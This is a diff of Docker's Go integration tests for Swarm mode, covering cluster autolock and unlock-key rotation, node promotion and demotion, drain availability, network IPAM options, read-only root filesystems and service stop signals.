+func (s *DockerSwarmSuite) TestSwarmLockUnlockCluster(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, true)
+
+	// they start off unlocked
+	d2.Restart(c)
+	c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive)
+
+	// stop this one so it does not get autolock info
+	d2.Stop(c)
+
+	// enable autolock
+	outs, err := d1.Cmd("swarm", "update", "--autolock")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	c.Assert(outs, checker.Contains, "docker swarm unlock")
+
+	var unlockKey string
+	for _, line := range strings.Split(outs, "\n") {
+		if strings.Contains(line, "SWMKEY") {
+			unlockKey = strings.TrimSpace(line)
+			break
+		}
+	}
+
+	c.Assert(unlockKey, checker.Not(checker.Equals), "")
+
+	outs, err = d1.Cmd("swarm", "unlock-key", "-q")
+	c.Assert(outs, checker.Equals, unlockKey+"\n")
+
+	// The ones that got the cluster update should be set to locked
+	for _, d := range []*daemon.Daemon{d1, d3} {
+		checkSwarmUnlockedToLocked(c, d)
+
+		cmd := d.Command("swarm", "unlock")
+		cmd.Stdin = bytes.NewBufferString(unlockKey)
+		icmd.RunCmd(cmd).Assert(c, icmd.Success)
+		c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
+	}
+
+	// d2 never got the cluster update, so it is still set to unlocked
+	d2.Start(c)
+	c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive)
+
+	// d2 is now set to lock
+	checkSwarmUnlockedToLocked(c, d2)
+
+	// leave it locked, and set the cluster to no longer autolock
+	outs, err = d1.Cmd("swarm", "update", "--autolock=false")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	// the ones that got the update are now set to unlocked
+	for _, d := range []*daemon.Daemon{d1, d3} {
+		checkSwarmLockedToUnlocked(c, d, unlockKey)
+	}
+
+	// d2 still locked
+	c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateLocked)
+
+	// unlock it
+	cmd := d2.Command("swarm", "unlock")
+	cmd.Stdin = bytes.NewBufferString(unlockKey)
+	icmd.RunCmd(cmd).Assert(c, icmd.Success)
+	c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive)
+
+	// once it's caught up, d2 is set to not be locked
+	checkSwarmLockedToUnlocked(c, d2, unlockKey)
+
+	// managers who join now are never set to locked in the first place
+	d4 := s.AddDaemon(c, true, true)
+	d4.Restart(c)
+	c.Assert(getNodeStatus(c, d4), checker.Equals, swarm.LocalNodeStateActive)
+}
+
+func (s *DockerSwarmSuite) TestSwarmJoinPromoteLocked(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+
+	// enable autolock
+	outs, err := d1.Cmd("swarm", "update", "--autolock")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+	c.Assert(outs, checker.Contains, "docker swarm unlock")
+
+	var unlockKey string
+	for _, line := range strings.Split(outs, "\n") {
+		if strings.Contains(line, "SWMKEY") {
+			unlockKey = strings.TrimSpace(line)
+			break
+		}
+	}
+
+	c.Assert(unlockKey, checker.Not(checker.Equals), "")
+
+	outs, err = d1.Cmd("swarm", "unlock-key", "-q")
+	c.Assert(outs, checker.Equals, unlockKey+"\n")
+
+	// joined workers start off unlocked
+	d2 := s.AddDaemon(c, true, false)
+	d2.Restart(c)
+	c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive)
+
+	// promote worker
+	outs, err = d1.Cmd("node", "promote", d2.NodeID())
+	c.Assert(err, checker.IsNil)
+	c.Assert(outs, checker.Contains, "promoted to a manager in the swarm")
+
+	// join new manager node
+	d3 := s.AddDaemon(c, true, true)
+
+	// both new nodes are locked
+	for _, d := range []*daemon.Daemon{d2, d3} {
+		checkSwarmUnlockedToLocked(c, d)
+
+		cmd := d.Command("swarm", "unlock")
+		cmd.Stdin = bytes.NewBufferString(unlockKey)
+		icmd.RunCmd(cmd).Assert(c, icmd.Success)
+		c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
+	}
+
+	// demote manager back to worker - workers are not locked
+	outs, err = d1.Cmd("node", "demote", d3.NodeID())
+	c.Assert(err, checker.IsNil)
+	c.Assert(outs, checker.Contains, "demoted in the swarm")
+
+	// Wait for it to actually be demoted, for the key and cert to be replaced.
+	// Then restart and assert that the node is not locked.  If we don't wait for the cert
+	// to be replaced, then the node still has the manager TLS key which is still locked
+	// (because we never want a manager TLS key to be on disk unencrypted if the cluster
+	// is set to autolock)
+	waitAndAssert(c, defaultReconciliationTimeout, d3.CheckControlAvailable, checker.False)
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		certBytes, err := ioutil.ReadFile(filepath.Join(d3.Folder, "root", "swarm", "certificates", "swarm-node.crt"))
+		if err != nil {
+			return "", check.Commentf("error: %v", err)
+		}
+		certs, err := helpers.ParseCertificatesPEM(certBytes)
+		if err == nil && len(certs) > 0 && len(certs[0].Subject.OrganizationalUnit) > 0 {
+			return certs[0].Subject.OrganizationalUnit[0], nil
+		}
+		return "", check.Commentf("could not get organizational unit from certificate")
+	}, checker.Equals, "swarm-worker")
+
+	// by now, it should *never* be locked on restart
+	d3.Restart(c)
+	c.Assert(getNodeStatus(c, d3), checker.Equals, swarm.LocalNodeStateActive)
+}
+
 func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
@@ -972,20 +1317,17 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) {
 		c.Assert(newUnlockKey, checker.Not(checker.Equals), "")
 		c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey)
 
-		c.Assert(d.Restart(), checker.IsNil)
-
-		info, err := d.info()
-		c.Assert(err, checker.IsNil)
-		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked)
+		d.Restart(c)
+		c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked)
 
 		outs, _ = d.Cmd("node", "ls")
 		c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
 
-		cmd := d.command("swarm", "unlock")
+		cmd := d.Command("swarm", "unlock")
 		cmd.Stdin = bytes.NewBufferString(unlockKey)
-		out, err := cmd.CombinedOutput()
+		result := icmd.RunCmd(cmd)
 
-		if err == nil {
+		if result.Error == nil {
 			// On occasion, the daemon may not have finished
 			// rotating the KEK before restarting. The test is
 			// intentionally written to explore this behavior.
@@ -996,26 +1338,25 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) {
 
 			time.Sleep(3 * time.Second)
 
-			c.Assert(d.Restart(), checker.IsNil)
+			d.Restart(c)
 
-			cmd = d.command("swarm", "unlock")
+			cmd = d.Command("swarm", "unlock")
 			cmd.Stdin = bytes.NewBufferString(unlockKey)
-			out, err = cmd.CombinedOutput()
+			result = icmd.RunCmd(cmd)
 		}
-		c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out)))
-		c.Assert(string(out), checker.Contains, "invalid key")
+		result.Assert(c, icmd.Expected{
+			ExitCode: 1,
+			Err:      "invalid key",
+		})
 
 		outs, _ = d.Cmd("node", "ls")
 		c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
 
-		cmd = d.command("swarm", "unlock")
+		cmd = d.Command("swarm", "unlock")
 		cmd.Stdin = bytes.NewBufferString(newUnlockKey)
-		out, err = cmd.CombinedOutput()
-		c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out)))
+		icmd.RunCmd(cmd).Assert(c, icmd.Success)
 
-		info, err = d.info()
-		c.Assert(err, checker.IsNil)
-		c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+		c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
 
 		outs, err = d.Cmd("node", "ls")
 		c.Assert(err, checker.IsNil)
@@ -1025,185 +1366,193 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) {
 	}
 }
 
-func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) {
-	d := s.AddDaemon(c, true, true)
+// This differs from `TestSwarmRotateUnlockKey` because that one rotates a single node, which is the leader.
+// This one keeps the leader up, and asserts that other manager nodes in the cluster also have their unlock
+// key rotated.
+func (s *DockerSwarmSuite) TestSwarmClusterRotateUnlockKey(c *check.C) {
+	d1 := s.AddDaemon(c, true, true) // leader - don't restart this one, we don't want leader election delays
+	d2 := s.AddDaemon(c, true, true)
+	d3 := s.AddDaemon(c, true, true)
 
-	// Create a service
-	name := "top"
-	_, err := d.Cmd("service", "create", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top")
-	c.Assert(err, checker.IsNil)
+	outs, err := d1.Cmd("swarm", "update", "--autolock")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
 
-	// Make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+	c.Assert(outs, checker.Contains, "docker swarm unlock")
 
-	// We need to get the container id.
-	out, err := d.Cmd("ps", "-a", "-q", "--no-trunc")
-	c.Assert(err, checker.IsNil)
-	id := strings.TrimSpace(out)
+	var unlockKey string
+	for _, line := range strings.Split(outs, "\n") {
+		if strings.Contains(line, "SWMKEY") {
+			unlockKey = strings.TrimSpace(line)
+			break
+		}
+	}
 
-	// Compare against expected output.
-	expectedOutput := "1.2.3.4\texample.com"
-	out, err = d.Cmd("exec", id, "cat", "/etc/hosts")
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
-}
+	c.Assert(unlockKey, checker.Not(checker.Equals), "")
 
-func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) {
-	d1 := s.AddDaemon(c, true, true)
-	d2 := s.AddDaemon(c, true, false)
-	d3 := s.AddDaemon(c, true, false)
+	outs, err = d1.Cmd("swarm", "unlock-key", "-q")
+	c.Assert(outs, checker.Equals, unlockKey+"\n")
 
-	// Manager Addresses will always show Node 1's address
-	expectedOutput := fmt.Sprintf("Manager Addresses:\n  127.0.0.1:%d\n", d1.port)
+	// Rotate multiple times
+	for i := 0; i != 3; i++ {
+		outs, err = d1.Cmd("swarm", "unlock-key", "-q", "--rotate")
+		c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+		// Strip \n
+		newUnlockKey := outs[:len(outs)-1]
+		c.Assert(newUnlockKey, checker.Not(checker.Equals), "")
+		c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey)
 
-	out, err := d1.Cmd("info")
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, expectedOutput)
-
-	out, err = d2.Cmd("info")
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, expectedOutput)
+		d2.Restart(c)
+		d3.Restart(c)
 
-	out, err = d3.Cmd("info")
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Contains, expectedOutput)
-}
+		for _, d := range []*daemon.Daemon{d2, d3} {
+			c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked)
 
-func (s *DockerSwarmSuite) TestSwarmServiceInspectPretty(c *check.C) {
-	d := s.AddDaemon(c, true, true)
+			outs, _ := d.Cmd("node", "ls")
+			c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
 
-	name := "top"
-	out, err := d.Cmd("service", "create", "--name", name, "--limit-cpu=0.5", "busybox", "top")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
+			cmd := d.Command("swarm", "unlock")
+			cmd.Stdin = bytes.NewBufferString(unlockKey)
+			result := icmd.RunCmd(cmd)
+
+			if result.Error == nil {
+				// On occasion, the daemon may not have finished
+				// rotating the KEK before restarting. The test is
+				// intentionally written to explore this behavior.
+				// When this happens, unlocking with the old key will
+				// succeed. If we wait for the rotation to happen and
+				// restart again, the new key should be required this
+				// time.
+
+				time.Sleep(3 * time.Second)
+
+				d.Restart(c)
+
+				cmd = d.Command("swarm", "unlock")
+				cmd.Stdin = bytes.NewBufferString(unlockKey)
+				result = icmd.RunCmd(cmd)
+			}
+			result.Assert(c, icmd.Expected{
+				ExitCode: 1,
+				Err:      "invalid key",
+			})
+
+			outs, _ = d.Cmd("node", "ls")
+			c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked")
+
+			cmd = d.Command("swarm", "unlock")
+			cmd.Stdin = bytes.NewBufferString(newUnlockKey)
+			icmd.RunCmd(cmd).Assert(c, icmd.Success)
+
+			c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
+
+			outs, err = d.Cmd("node", "ls")
+			c.Assert(err, checker.IsNil)
+			c.Assert(outs, checker.Not(checker.Contains), "Swarm is encrypted and needs to be unlocked")
+		}
 
-	expectedOutput := `
-Resources:
- Limits:
-  CPU:		0.5`
-	out, err = d.Cmd("service", "inspect", "--pretty", name)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out))
+		unlockKey = newUnlockKey
+	}
 }
 
-func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) {
+func (s *DockerSwarmSuite) TestSwarmAlternateLockUnlock(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	var unlockKey string
+	for i := 0; i < 2; i++ {
+		// set to lock
+		outs, err := d.Cmd("swarm", "update", "--autolock")
+		c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+		c.Assert(outs, checker.Contains, "docker swarm unlock")
 
-	out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]")
+		for _, line := range strings.Split(outs, "\n") {
+			if strings.Contains(line, "SWMKEY") {
+				unlockKey = strings.TrimSpace(line)
+				break
+			}
+		}
 
-	out, err = d.Cmd("service", "create", "--network=foo", "--name", "top", "busybox", "top")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
+		c.Assert(unlockKey, checker.Not(checker.Equals), "")
+		checkSwarmUnlockedToLocked(c, d)
 
-	// make sure task has been deployed.
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+		cmd := d.Command("swarm", "unlock")
+		cmd.Stdin = bytes.NewBufferString(unlockKey)
+		icmd.RunCmd(cmd).Assert(c, icmd.Success)
 
-	out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(strings.TrimSpace(out), checker.Equals, "map[foo:bar]")
+		c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive)
+
+		outs, err = d.Cmd("swarm", "update", "--autolock=false")
+		c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs))
+
+		checkSwarmLockedToUnlocked(c, d, unlockKey)
+	}
 }
 
-// TODO: migrate to a unit test
-// This test could be migrated to unit test and save costly integration test,
-// once PR #29143 is merged.
-func (s *DockerSwarmSuite) TestSwarmUpdateWithoutArgs(c *check.C) {
+func (s *DockerSwarmSuite) TestExtraHosts(c *check.C) {
 	d := s.AddDaemon(c, true, true)
 
-	expectedOutput := `
-Usage:	docker swarm update [OPTIONS]
+	// Create a service
+	name := "top"
+	_, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--host=example.com:1.2.3.4", "busybox", "top")
+	c.Assert(err, checker.IsNil)
 
-Update the swarm
+	// Make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
-Options:`
+	// We need to get the container id.
+	out, err := d.Cmd("ps", "-a", "-q", "--no-trunc")
+	c.Assert(err, checker.IsNil)
+	id := strings.TrimSpace(out)
 
-	out, err := d.Cmd("swarm", "update")
-	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
-	c.Assert(out, checker.Contains, expectedOutput, check.Commentf(out))
+	// Compare against expected output.
+	expectedOutput := "1.2.3.4\texample.com"
+	out, err = d.Cmd("exec", id, "cat", "/etc/hosts")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
 }
 
-func (s *DockerTrustedSwarmSuite) TestTrustedServiceCreate(c *check.C) {
-	d := s.swarmSuite.AddDaemon(c, true, true)
-
-	// Attempt creating a service from an image that is known to notary.
-	repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull")
-
-	name := "trusted"
-	serviceCmd := d.command("-D", "service", "create", "--name", name, repoName, "top")
-	s.trustSuite.trustedCmd(serviceCmd)
-	out, _, err := runCommandWithOutput(serviceCmd)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out))
-
-	out, err = d.Cmd("service", "inspect", "--pretty", name)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out))
-
-	// Try trusted service create on an untrusted tag.
+func (s *DockerSwarmSuite) TestSwarmManagerAddress(c *check.C) {
+	d1 := s.AddDaemon(c, true, true)
+	d2 := s.AddDaemon(c, true, false)
+	d3 := s.AddDaemon(c, true, false)
 
-	repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-	dockerCmd(c, "push", repoName)
-	dockerCmd(c, "rmi", repoName)
+	// Manager Addresses will always show Node 1's address
+	expectedOutput := fmt.Sprintf("Manager Addresses:\n  127.0.0.1:%d\n", d1.SwarmPort)
 
-	name = "untrusted"
-	serviceCmd = d.command("service", "create", "--name", name, repoName, "top")
-	s.trustSuite.trustedCmd(serviceCmd)
-	out, _, err = runCommandWithOutput(serviceCmd)
+	out, err := d1.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput)
 
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
+	out, err = d2.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput)
 
-	out, err = d.Cmd("service", "inspect", "--pretty", name)
-	c.Assert(err, checker.NotNil, check.Commentf(out))
+	out, err = d3.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, expectedOutput)
 }
 
-func (s *DockerTrustedSwarmSuite) TestTrustedServiceUpdate(c *check.C) {
-	d := s.swarmSuite.AddDaemon(c, true, true)
-
-	// Attempt creating a service from an image that is known to notary.
-	repoName := s.trustSuite.setupTrustedImage(c, "trusted-pull")
-
-	name := "myservice"
-
-	// Create a service without content trust
-	_, err := d.Cmd("service", "create", "--name", name, repoName, "top")
-	c.Assert(err, checker.IsNil)
+func (s *DockerSwarmSuite) TestSwarmNetworkIPAMOptions(c *check.C) {
+	d := s.AddDaemon(c, true, true)
 
-	out, err := d.Cmd("service", "inspect", "--pretty", name)
+	out, err := d.Cmd("network", "create", "-d", "overlay", "--ipam-opt", "foo=bar", "foo")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	// Daemon won't insert the digest because this is disabled by
-	// DOCKER_SERVICE_PREFER_OFFLINE_IMAGE.
-	c.Assert(out, check.Not(checker.Contains), repoName+"@", check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
 
-	serviceCmd := d.command("-D", "service", "update", "--image", repoName, name)
-	s.trustSuite.trustedCmd(serviceCmd)
-	out, _, err = runCommandWithOutput(serviceCmd)
+	out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "resolved image tag to", check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Contains, "foo:bar")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "com.docker.network.ipam.serial:true")
 
-	out, err = d.Cmd("service", "inspect", "--pretty", name)
+	out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--network=foo", "--name", "top", "busybox", "top")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, repoName+"@", check.Commentf(out))
-
-	// Try trusted service update on an untrusted tag.
-
-	repoName = fmt.Sprintf("%v/untrustedservicecreate/createtest:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-	dockerCmd(c, "push", repoName)
-	dockerCmd(c, "rmi", repoName)
 
-	serviceCmd = d.command("service", "update", "--image", repoName, name)
-	s.trustSuite.trustedCmd(serviceCmd)
-	out, _, err = runCommandWithOutput(serviceCmd)
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
 
-	c.Assert(err, check.NotNil, check.Commentf(out))
-	c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out))
+	out, err = d.Cmd("network", "inspect", "--format", "{{.IPAM.Options}}", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Contains, "foo:bar")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "com.docker.network.ipam.serial:true")
 }
 
 // Test case for issue #27866, which did not allow NW name that is the prefix of a swarm NW ID.
@@ -1252,3 +1601,462 @@ func (s *DockerSwarmSuite) TestSwarmNetworkCreateDup(c *check.C) {
 		}
 	}
 }
+
+func (s *DockerSwarmSuite) TestSwarmPublishDuplicatePorts(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--publish", "5005:80", "--publish", "5006:80", "--publish", "80", "--publish", "80", "busybox", "top")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+
+	// Total len = 4, with 2 dynamic ports and 2 non-dynamic ports
+	// Dynamic ports are likely to be 30000 and 30001 but doesn't matter
+	out, err = d.Cmd("service", "inspect", "--format", "{{.Endpoint.Ports}} len={{len .Endpoint.Ports}}", id)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "len=4")
+	c.Assert(out, checker.Contains, "{ tcp 80 5005 ingress}")
+	c.Assert(out, checker.Contains, "{ tcp 80 5006 ingress}")
+}
+
+func (s *DockerSwarmSuite) TestSwarmJoinWithDrain(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("node", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), "Drain")
+
+	out, err = d.Cmd("swarm", "join-token", "-q", "manager")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	token := strings.TrimSpace(out)
+
+	d1 := s.AddDaemon(c, false, false)
+
+	out, err = d1.Cmd("swarm", "join", "--availability=drain", "--token", token, d.SwarmListenAddr())
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	out, err = d.Cmd("node", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Drain")
+
+	out, err = d1.Cmd("node", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Drain")
+}
+
+func (s *DockerSwarmSuite) TestSwarmInitWithDrain(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+
+	out, err := d.Cmd("swarm", "init", "--availability", "drain")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+
+	out, err = d.Cmd("node", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Drain")
+}
+
+func (s *DockerSwarmSuite) TestSwarmReadonlyRootfs(c *check.C) {
+	testRequires(c, DaemonIsLinux, UserNamespaceROMount)
+
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top", "--read-only", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.ReadOnly }}", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "true")
+
+	containers := d.ActiveContainers(c)
+	out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.HostConfig.ReadonlyRootfs}}", containers[0])
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "true")
+}
+
+func (s *DockerSwarmSuite) TestNetworkInspectWithDuplicateNames(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "foo"
+	options := types.NetworkCreate{
+		CheckDuplicate: false,
+		Driver:         "bridge",
+	}
+
+	cli, err := d.NewClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	n1, err := cli.NetworkCreate(context.Background(), name, options)
+	c.Assert(err, checker.IsNil)
+
+	// Full ID always works
+	out, err := d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID)
+
+	// Name works if it is unique
+	out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID)
+
+	n2, err := cli.NetworkCreate(context.Background(), name, options)
+	c.Assert(err, checker.IsNil)
+	// Full ID always works
+	out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID)
+
+	out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n2.ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, n2.ID)
+
+	// Name with duplicates
+	out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "2 matches found based on name")
+
+	out, err = d.Cmd("network", "rm", n2.ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Dupliates with name but with different driver
+	options.Driver = "overlay"
+
+	n2, err = cli.NetworkCreate(context.Background(), name, options)
+	c.Assert(err, checker.IsNil)
+
+	// Full ID always works
+	out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n1.ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, n1.ID)
+
+	out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", n2.ID)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, n2.ID)
+
+	// Name with duplicates
+	out, err = d.Cmd("network", "inspect", "--format", "{{.ID}}", name)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "2 matches found based on name")
+}
+
+func (s *DockerSwarmSuite) TestSwarmStopSignal(c *check.C) {
+	testRequires(c, DaemonIsLinux, UserNamespaceROMount)
+
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top", "--stop-signal=SIGHUP", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1)
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.StopSignal }}", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "SIGHUP")
+
+	containers := d.ActiveContainers(c)
+	out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.StopSignal}}", containers[0])
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "SIGHUP")
+
+	out, err = d.Cmd("service", "update", "--detach", "--stop-signal=SIGUSR1", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.StopSignal }}", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "SIGUSR1")
+}
+
+func (s *DockerSwarmSuite) TestSwarmServiceLsFilterMode(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "top1", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
